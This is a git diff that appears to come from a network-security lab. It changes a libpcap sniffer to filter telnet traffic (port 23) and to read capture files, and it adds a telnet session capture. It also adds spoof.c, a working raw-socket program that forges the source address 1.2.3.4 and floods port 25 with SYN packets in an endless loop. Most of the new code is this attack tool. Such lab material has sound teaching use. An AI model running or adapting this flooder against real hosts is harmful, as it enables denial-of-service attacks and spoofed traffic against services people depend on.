diff --git a/sniffex.c b/sniffex.c
index e968583..e88e886 100644
--- a/sniffex.c
+++ b/sniffex.c
@@ -507,7 +507,7 @@ int main(int argc, char **argv)
 	char errbuf[PCAP_ERRBUF_SIZE];		/* error buffer */
 	pcap_t *handle;				/* packet capture handle */
 
-	char filter_exp[] = "dst portrange 10-100 and tcp";		/* filter expression [3] */
+	char filter_exp[] = "port 23";		/* filter expression [3] */
 	struct bpf_program fp;			/* compiled filter program (expression) */
 	bpf_u_int32 mask;			/* subnet mask */
 	bpf_u_int32 net;			/* ip */
@@ -515,11 +515,19 @@ int main(int argc, char **argv)
 
 	print_app_banner();
 
+    // Check if file arg is passed.
+    int read_file = 0;
+
 	/* check for capture device name on command-line */
 	if (argc == 2) {
-		dev = argv[1];
+        dev = argv[1];
 	}
-	else if (argc > 2) {
+    else if (argc == 3) {
+        if (!strcmp(argv[1], "file")) {
+            read_file = 1;
+        }
+    }
+	else if (argc > 3) {
 		fprintf(stderr, "error: unrecognized command-line options\n\n");
 		print_app_usage();
 		exit(EXIT_FAILURE);
@@ -547,8 +555,14 @@ int main(int argc, char **argv)
 	printf("Number of packets: %d\n", num_packets);
 	printf("Filter expression: %s\n", filter_exp);
 
-	/* open capture device */
-	handle = pcap_open_live(dev, SNAP_LEN, 1, 1000, errbuf);
+    if (read_file) {
+        printf("%s\n", argv[2]);
+        handle = pcap_open_offline(argv[2], errbuf);
+    }
+    else {
+        /* open capture device */
+        handle = pcap_open_live(dev, SNAP_LEN, 1, 1000, errbuf);
+    }
 	if (handle == NULL) {
 		fprintf(stderr, "Couldn't open device %s: %s\n", dev, errbuf);
 		exit(EXIT_FAILURE);
@@ -574,8 +588,8 @@ int main(int argc, char **argv)
 		exit(EXIT_FAILURE);
 	}
 
-	/* now we can set our callback function */
-	pcap_loop(handle, num_packets, got_packet, NULL);
+    /* now we can set our callback function */
+    pcap_loop(handle, num_packets, got_packet, NULL);
 
 	/* cleanup */
 	pcap_freecode(&fp);
diff --git a/spoof.c b/spoof.c
new file mode 100644
index 0000000..a5f60bc
--- /dev/null
+++ b/spoof.c
@@ -0,0 +1,96 @@
+#define __USE_BSD	/* use bsd'ish ip header */
+#include <sys/socket.h>	/* these headers are for a Linux system, but */
+#include <netinet/in.h>	/* the names on other systems are easy to guess.. */
+#include <netinet/ip.h>
+#define __FAVOR_BSD	/* use bsd'ish tcp header */
+#include <netinet/tcp.h>
+#include <unistd.h>
+#include <string.h>
+#include <stdio.h>
+
+#define P 25		/* lets flood the sendmail port */
+
+unsigned short		/* this function generates header checksums */
+csum (unsigned short *buf, int nwords)
+{
+  unsigned long sum;
+  for (sum = 0; nwords > 0; nwords--)
+    sum += *buf++;
+  sum = (sum >> 16) + (sum & 0xffff);
+  sum += (sum >> 16);
+  return ~sum;
+}
+
+int 
+main (void)
+{
+  int s = socket (PF_INET, SOCK_RAW, IPPROTO_TCP);	/* open raw socket */
+  char datagram[4096];	/* this buffer will contain ip header, tcp header,
+			   and payload. we'll point an ip header structure
+			   at its beginning, and a tcp header structure after
+			   that to write the header values into it */
+  struct ip *iph = (struct ip *) datagram;
+  struct tcphdr *tcph = (struct tcphdr *) datagram + sizeof (struct ip);
+  struct sockaddr_in sin;
+			/* the sockaddr_in containing the dest. address is used
+			   in sendto() to determine the datagrams path */
+
+  sin.sin_family = AF_INET;
+  sin.sin_port = htons (P);/* you byte-order >1byte header values to network
+			      byte order (not needed on big endian machines) */
+  sin.sin_addr.s_addr = inet_addr ("127.0.0.1");
+
+  memset (datagram, 0, 4096);	/* zero out the buffer */
+
+/* we'll now fill in the ip/tcp header values, see above for explanations */
+  iph->ip_hl = 5;
+  iph->ip_v = 4;
+  iph->ip_tos = 0;
+  iph->ip_len = sizeof (struct ip) + sizeof (struct tcphdr);	/* no payload */
+  iph->ip_id = htonl (54321);	/* the value doesn't matter here */
+  iph->ip_off = 0;
+  iph->ip_ttl = 255;
+  iph->ip_p = 6;
+  iph->ip_sum = 0;		/* set it to 0 before computing the actual checksum later */
+  iph->ip_src.s_addr = inet_addr ("1.2.3.4");/* SYN's can be blindly spoofed */
+  iph->ip_dst.s_addr = sin.sin_addr.s_addr;
+  tcph->th_sport = htons (1234);	/* arbitrary port */
+  tcph->th_dport = htons (P);
+  tcph->th_seq = random ();/* in a SYN packet, the sequence is a random */
+  tcph->th_ack = 0;/* number, and the ack sequence is 0 in the 1st packet */
+  tcph->th_x2 = 0;
+  tcph->th_off = 0;		/* first and only tcp segment */
+  tcph->th_flags = TH_SYN;	/* initial connection request */
+  tcph->th_win = htonl (65535);	/* maximum allowed window size */
+  tcph->th_sum = 0;/* if you set a checksum to zero, your kernel's IP stack
+		      should fill in the correct checksum during transmission */
+  tcph->th_urp = 0;
+
+  iph->ip_sum = csum ((unsigned short *) datagram, iph->ip_len >> 1);
+
+/* finally, it is very advisable to do a IP_HDRINCL call, to make sure
+   that the kernel knows the header is included in the data, and doesn't
+   insert its own header into the packet before our data */
+
+  {				/* lets do it the ugly way.. */
+    int one = 1;
+    const int *val = &one;
+    if (setsockopt (s, IPPROTO_IP, IP_HDRINCL, val, sizeof (one)) < 0)
+      printf ("Warning: Cannot set HDRINCL!\n");
+  }
+
+  while (1)
+    {
+      if (sendto (s,		/* our socket */
+		  datagram,	/* the buffer containing headers and data */
+		  iph->ip_len,	/* total length of our datagram */
+		  0,		/* routing flags, normally always 0 */
+		  (struct sockaddr *) &sin,	/* socket addr, just like in */
+		  sizeof (sin)) < 0)		/* a normal send() */
+	printf ("error\n");
+      else
+	printf (".");
+    }
+
+  return 0;
+}
diff --git a/tfsession.pcap b/tfsession.pcap
new file mode 100644
index 0000000..5a48535
Binary files /dev/null and b/tfsession.pcap differ